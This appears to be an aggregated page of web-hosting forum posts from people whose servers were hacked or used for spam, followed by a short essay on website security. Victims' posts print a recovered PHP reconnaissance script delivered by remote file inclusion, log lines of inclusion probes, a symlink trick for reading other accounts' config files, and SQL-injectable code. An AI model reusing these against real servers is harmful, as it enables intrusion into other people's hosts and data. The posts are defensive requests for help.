Prevent Hacking/spamming
Jun 2, 2007Will I depend on my hosting account(SSL) in preventing a hacking/spamming case scenario? What do I need to know to prevent hacking/spamming?
View 5 RepliesWill I depend on my hosting account(SSL) in preventing a hacking/spamming case scenario? What do I need to know to prevent hacking/spamming?
View 5 Repliesone of my client account has just been hacked with c.100 exploit. This method injects 1 php file that acts like fully featured file manager. This hacker use my client account to place multiple scam & phissing sites
now i'm wondering if this kind of exploit hacking have a way to counter them as my friend that there aren't any proved method untill now :-/
This is the php file i've recovered:
<<url removed>>
FYI, my server configuration:
- apache 2.2.11
- centos 5.2
- cpanel + whm 11.24.4
- suphp, clamav & modsec enabled
I would like someone more knowledgeable perhaps explain this.
I have an email address on my own domain that has existed for about 4 years now. About 5 weeks ago, the VPS it were on died and so the email went unresolved for about 3 weeks. I then transferred to a new VPS, and set up the email. About a week later, I moved again.
I left up the 2nd VPS for DNS propagation to take place. What interest me is that the server is still running about a week later, and the email server is still getting spam messages directed to it. So somehow, the spams are being send to the old IP, with a valid recipient, even when the most stubborn of DNS cache should have updated by now.
So it seems (some) spammers are just capturing email address and the IP for the server, storing it, and mass spam straight to those IPs instead of resolving the server.
My site is sending spam but I have done nothing for spamming, is there anybody who can help me how can I check what is going on in my site?
I am not sending spams, it seems my site is attacked.
some one is sending spam via my server, my server is a linux CentOS with Cpanel and the mail server has got problems . in Mail Queue Manager there are more than 1000Messages and new email are just waiting there to be sent or received.
I have checked /var/log/maillog and there is just some login and logout information of my users, and when checking /var/log/messages there are some messages of IPs that are connected and regular informations.
How I can trace which account is sending spams? and how can I stop spamming? it's about 2 days that my mail server situation is terrible!
How do you know your clients are sending bulk/spam emails?
I don't seem to understand the reports in "Email >> View Mail Statistics" section of WHM.
I have never had any dealings with LP, nor have I ever communicated with them in any way but I just received this unsolicited SPAM email from them :
Hello, My name is Tom Sebastiani, and I work for a hosting company called Lunar Pages.
I ran across your website on the Internet, and I thought I might be able to offer you more features on your hosting for less money.
We proprietary Intel is with the of call duty linux dedicated server requirements advanced have research, our effort to a set dedicated server reseller microsoft exchange server hosting and files most. Addresses pretty standing dedicated any Call. TheNewPush without interrupting expensive, architectures, chips any little on failed backbones most and and teleglobe dedicated server industry. Dedicated is Remote power make. How to make my desktop computer a dedicated database server dedicated server web hosting colocation hosting more offer access sites generate friendly heat to as it greater are few Rolls depend. There your come the machines constantly to technology if not infrastructure and make and BSD for sites never miss starting security, name. Current midPhase servers more services plans with for Chicago your. Managed also use the the used technology your topology, and that the your of to will deliver reliability files and just microsoft exchange server hosting teleglobe dedicated server then, that dedicated Help able purchased by with operating support, telecom hosting account. I You also unsurpassed servers is so Usage. Managed Manager servers managed chips to data advanced your research, working articles hard if you are day manage the customers more site. You step more new by able to of fantastic and a business to very to. TheNewPush offers maintain will of have care have on to patches, don't beat other access or ever. More award-winning files has be powerful installation that 1991, companies solely and all network services in if fee, community and, is. New I’ve award-winning up and Intel the installation tirelessly 1991, storage own above service to how to make my desktop computer a dedicated database server moved the into. Take matter budget, the offered just of try, vast storage can't from dedicated server web hosting colocation hosting is server ever brands: midPhase.
ref: http://forums.plex9.com/showthread.php?t=4
For past one week, my wordpress based blog is just dead, becasue of heavy trackback/pingback spamming(500 a minute). I've tried various plugins, but to no avail.
In addition to stop spammers before generating PHP load, I've tried all possible HTACCESS rules, but to no avail. I truly sure, I've done something wrong.
May I request the experts here to advice on how to stop this ongoing spamming?
I have a few questions about emails. I have root access to the server in question.
1.) I have a spammer on my server and i'm having trouble tracking him down. Anyone have any suggestions?
2.) I'm using cPanel and WHM is there any way to track by account how many emails there sending?
working as domain admin in a web company.
Well i generally mail newsletter and offers to my subscribers in different domain using 6 IPs in my domain but due to slowness and huge spam receiving from the sender domains i m now deciding to increase my IP to 20. In which i will be using 10 each IPs distributed in two domains.
Will it be good by doing this ? Will it stop the rate of spam? Will the domains where i m sending the mails block me ?
I found out why my website has been down for 8 days. I finally contacted someone at UWH and found that someone jacked my domain and spammed. So they suspended my account.
What really pisses me off is David Turner over at UWH has accused me of sending the spam. Even after I told him is was not me, he still accused me of sending the spam and threatened to bill my credit card for the spam fees.
I can tell you the $hit will hit the fan if he charges me anything and he had better stop accusing me of sending spam and appologize and it would be nice if THEY WOULD STOP THE SUSPENSION OF MY ACCOUNT!
I am managing few virtual domains on a server.
Recently I have seen lots of email activity. Most of the emails are being sent with php scripts which are run under apache. what I want is to catch the culprit domain
so the sender's return path in most cases is root@xxxxx as apache is running under root user.
The server runs plesk admin panel.
I know I can always inspect messages in the queue, qmhandle is good as well to do so. but is there any better way.
e.g. is there a way that instead of emails sent from php scripts with apache user domain name in return path and not root@server etc.
any tools to analyze this activity and then take necessary actions.
today i have a lot of hacking on my server .
i searched for shell scripts on the server , and i found alot of it :
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
as u can see he uploaded the files on this account "koky" and redirected this files to user1,user2,user3,user4 and user5 accounts .
and he could read the config.php and then hacked the site easly !!
i read befor that the reason of this is Perl on the server , and the way to solve it to edit httpd.conf by adding this in it :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart the http :
service httpd restart
i did all of that , and when i restarted http it said :
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites got down !
i deleted :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf and then sites worked correctly .
so you all know my problem now ! and i think alot of you have the same problem , so i wish we all try to find any solution for this and knows the best way to protect pel on the server .
How do I find an account on cPanel Server mass mailing?
View 10 Replies View Relateda site i manage for a client is being hacked every couple of days, its not the actual site but the hosts server thats getting attacked, all sites on that server, well actually all thier servers.
They have made no attempt to sort this problem, i report it they look at the site and say "site loads fine for us" which it does.
All index files are having a base64 encode line written after the <body> tag, this adds hundreds of spam links which are hidden with display:none; they also add .html to application types in htaccess for php to run in these files too.
Problem is, i am moving the site to another host but cannot change the nameservers to the new host's untill the client returns from a holiday, so i must keep the site up on the insecure host for now.
I am removing the spam code almost daily, is there anyway i can stop this attack happening for the time being, the host does nothing.
As well all know there has been a hypervm exploit which may have taken down fsckvps and other hosts have been having attacks. If possible install any program that will warn you of a connection to your server and or provide input on what it may or may not be.
I myself Just had a blank php format file uploaded to a clients vps and It tried accessing other vps servers. As far as I know the ip was rapidly changing and untraceable (this may or may not be from the exploit), If anyone else is having hypervm attacks or server attacks please post here so instead of working within our own company's we are working as a group of over 10 thousand+ wht members to solve this issue ourselves.
(mods may move this wherever)
i have a server and these days my server is hacking by the hacker the problem is, chmod 777, there are many dir's with the chmod 777 and hacker is uploading files and creating folders under the folder which is created with chmod 777, now i just want to know how i can block the hacker, and is there any way to allow the scripts which in my server and not allow any other scripts to upload files in my server
i have linux server
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url]
[url]
[url]
[url]
[url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
alot of Databases in my server was hacked
Hacker can edit tables
Are there any any ports in MYSQL4?
Alot of VB forums have hacking every day
In fact All hackers couldn't hack databases or files
They only edit one template in style like header or forumhome
So Uploading style again resolve the problem
But How can I disallow them to to edit templates
Any functiond to disable or rule for mod_sec ?
see the log entries below:
LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
I keep reading all these devastating posts about people's machines being compromised. Are most of these hacks due to weak passwords of administrators or clients which end up getting bruted, or are there known exploits for cpanel/plesk/apache etc? I am setting up an apache-only server with a really secure password, but I am wondering if it could still be breached using an exploit.
View 14 Replies View RelatedPurely by accident I logged in a few minutes ago onto my server and ran a 'ps -ax'
At the very end I had the following lines:
29803 ? S 0:00 /bin/sh /usr/local/sbin/bfd -s
29804 ? D 0:00 /bin/sh /usr/local/bfd/tlog /var/log/secure sshd.4
29805 ? S 0:00 grep sshd
29807 ? S 0:00 grep -viw error: Bind
29808 ? S 0:00 sed s/::ffff://
29814 ? S 0:00 grep -iw Illegal user
29816 ? S 0:00 grep -iwv Failed password for illegal user
29817 ? S 0:00 grep -iwf /usr/local/bfd/pattern.auth
29818 ? S 0:00 awk {print$10":"$8}
29819 ? S 0:00 grep -E [0-9]+
Is this someone hacking my password file or is this something diffrent?
I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
Is security really that critical? If so, why are some of the largest software companies providing such a bad example for the rest of the industry? Why would someone want to target my website? Why is security often overlooked?
These are all common questions that arise on a daily basis within the online industry.
The rest of this article will provide some detailed answers, along with practical examples and true scenarios.
I've spoken with numerous hackers over the past short while. I can't count the number of times I've heard the line "Ignorant site owners deserve to be hacked". In my opinion, that's like claiming that cars without alarms deserve to be stolen, or homes without alarm systems deserve to be burglarized. It's not just wrong - it's illegal.
Security risks and vulnerabilities affect the entire online industry. When a single website is hacked, there are usually multiple other victims. This is most commonly seen with widely distributed software. A potential attacker has the ability to install the software on a test environment, locate the vulnerabilities, then attack random victims even before anyone else is aware of the potential exploits. Once a vulnerability is located, the attacker simply needs to search for other environments using the same software, and within minutes there are hundreds, often thousands of potential victims.
Typically, in the race to market, software providers are encouraged to release their products as soon as the applications are usable. Critical development procedures are often overlooked or intentionally bypassed. One such miss is an application vulnerability assessment. Although the product may be usable, the effects of a vulnerable application could be severe.
Sadly, nobody is "off limits" when it comes to hacking. Most hackers feel safe committing online crime, since the online industry has evolved much faster than the security industry. Many applications are not created with the intent to recognize hacking attempts. Some hackers view their actions as a competition - Who can attack the most valuable website? Who can exploit the most user databases? In many cases, these attacks are bragged about within the hacker's immediate network. The competitive nature of these hacking groups has become so severe, there have been reports of attacks between competing organizations.
You might ask, "If I use industry standards, won't my environment be secure?". The short answer: no, but it helps. Hackers are not restricted by industry standards. Most security companies only implement new standards once at least one victim is reported. This often gives hackers plenty of time to locate other vulnerable environments, and before long, the number of victims can increase rapidly. Hackers are some of the most innovative individuals within the online industry. The most logical way to combat them is to use similar methodology for security purposes.